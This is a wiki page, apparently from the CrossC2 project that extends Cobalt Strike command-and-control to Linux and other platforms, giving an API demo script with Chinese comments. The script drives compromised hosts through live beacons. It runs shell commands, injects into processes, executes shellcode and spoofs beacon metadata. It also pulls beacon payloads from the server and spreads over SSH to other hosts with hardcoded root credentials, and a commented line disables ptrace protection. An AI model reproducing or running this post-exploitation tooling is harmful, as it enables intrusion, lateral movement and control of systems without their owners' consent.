Skip to content

API Demo

Jump to bottom
hooooooooooook edited this page Jun 11, 2022 · 1 revision 
println("---------- third party ----------------");

sub callback_ls{
    # $1 = beacon ID, $2 = the folder, $3 = results
    $bid = $1;
    $pwd = $2;
    $res = $3;

    blog($bid, @($pwd, $res));
}

sub callback_ps {
    $bid = $1;
    $res = $2;

    blog($bid, @($res));
}

foreach $beacon (beacons()) {
    if (!-isactive $beacon['id']) {
    } else if (-isssh $beacon['id']) {
        $bid = $beacon['id'];
        blog($bid, "auto api test demo");  # 记录日志

        bshell($bid, "echo \$AAA");  # 命令执行
        bcc2_setenv($bid, "AAA", "ccc");  # 设置环境变量
        bshell($bid, "echo \$AAA");

        bcc2_unsetenv($bid, "AAA");     # 删除环境变量
        bshell($bid, "echo \$AAA");

        bsleep($bid, 2);    # 设置休眠时间

        btask($bid, "list dir");  # 记录执行任务
        bls($bid, "./", &callback_ls);  # 获取执行目录下的文件列表信息, 支持回调

        btask($bid, "list process");
        bps($bid, &callback_ps);  # 获取进程信息, 支持回调

        bpwd($bid); # <---------- teamserver ignore
        bmkdir($bid, "/tmp/1234");      # 创建目录
        bcd($bid, "/tmp/1234");     # 切换工作目录
        bpwd($bid);             # 获取工作目录

        bkill($bid, 123);       # 结束指定PID进程
        brm($bid, "/tmp/1234/aaa");    # 删除文件 / 文件夹

        bsetostype($bid, "printer");    # 修改 beacon 元数据中的操作系统类型
        bsetlocalip($bid, "10.0.0.1");      # 修改 beacon 元数据中的内网IP
        bsethostname($bid, "test_hostname");    # 修改 beacon 元数据中的主机名称

        # bshell($bid, "echo 0 > /proc/sys/kernel/yama/ptrace_scope");
        bcc2_inject($bid, 1234, "aaaa", "/tmp/1234/");      # 向指定PID进程注入指定内容

        bssh_jump($bid, "root", "123456", "", "ssh", "test_demo_cc2_listener", @("10.0.1.3", "10.0.1.4"), "/tmp/1234/");  # 向目标主机列表通过 SSH 协议,上线指定listener的beacon

        $res = getSSHSession();     # 获取活跃状态的 CrossC2 会话
        blog($bid, $res);

        $res = getCrossC2Site();       # 获取服务端 CrossC2 beacon的下载地址
        blog($bid, $res);

        $res = getCrossC2Listener();    # 获取服务端配置的 CrossC2 监听器信息
        blog($bid, $res);

        $libbeacon = getCrossC2Beacon("test_demo_cc2_listener", "lib");     # 从服务端指定 CrossC2 监听器中获取动态库类型 beacon
        $beacon = getCrossC2Beacon("test_demo_cc2_listener", "main");     # 从服务端指定 CrossC2 监听器中获取可执行文件类型 beacon
        $len_libbeacon = size($libbeacon);
        $len_beacon = size($beacon);
        blog($bid, "libbeacon size: $len_libbeacon");
        blog($bid, "beacon size: $len_beacon");

        bcc2_unsetenv($bid, "AAA")
        bshell($bid, "export");

        # run shellcode
        bshellcode($bid, "\\x90\\x90\\x90\\x90");           # 指定会话中执行 shellcode

    }
}

Installation - Pull request - Change Log - API Reference

CrossC2 Logo

CobaltStrike's cross-platform C2 expansion framework

Getting Started

Information

Clone this wiki locally